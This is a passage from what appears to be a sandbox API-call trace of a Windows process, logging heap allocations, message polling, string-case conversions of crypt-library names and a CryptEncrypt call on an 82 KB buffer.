0x88cbe0 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.349] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.349] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.349] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.350] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.350] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0030.350] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0030.351] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.351] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.351] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0030.351] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.352] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.352] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.353] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0030.353] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0030.354] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.354] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0030.354] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da238, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da238*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.354] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.354] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.354] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.354] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.355] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.355] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.355] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.355] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0030.356] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0030.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.356] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x140b1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x140c0) returned 1 [0030.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.356] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0030.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.357] CharLowerBuffW (in: lpsz="byte[82113]", cchLength=0xb | out: lpsz="byte[82113]") returned 0xb [0030.357] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.358] 